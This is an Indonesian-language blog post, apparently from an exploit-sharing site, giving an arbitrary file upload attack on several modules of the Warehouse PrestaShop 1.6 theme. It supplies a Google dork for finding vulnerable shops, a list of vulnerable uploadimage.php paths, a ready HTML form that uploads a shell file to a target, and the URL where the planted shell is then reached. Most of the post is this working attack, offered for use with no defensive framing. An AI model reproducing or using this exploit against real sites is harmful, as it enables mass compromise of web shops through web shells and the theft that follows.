Home  ›  exploit

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload

June 22, 2016 Add Comment Edit
Exploit Author :
people_hurt

Dork :
- inurl:/modules/columnadverts/
- Kembangin lagi ya :D

Jika Vuln akan seperti ini :
Exploit & poc :
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"

Exploit :
<form method="POST" action="TARGET/modules/module name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
Respon : success:shell.xxx
Auto Exploit:
DISINI

Shell Access :
TARGET/modules/modul name/slides/shell.xxx

0 Response to "Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload"

Post a Comment

Subscribe to: Post Comments (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel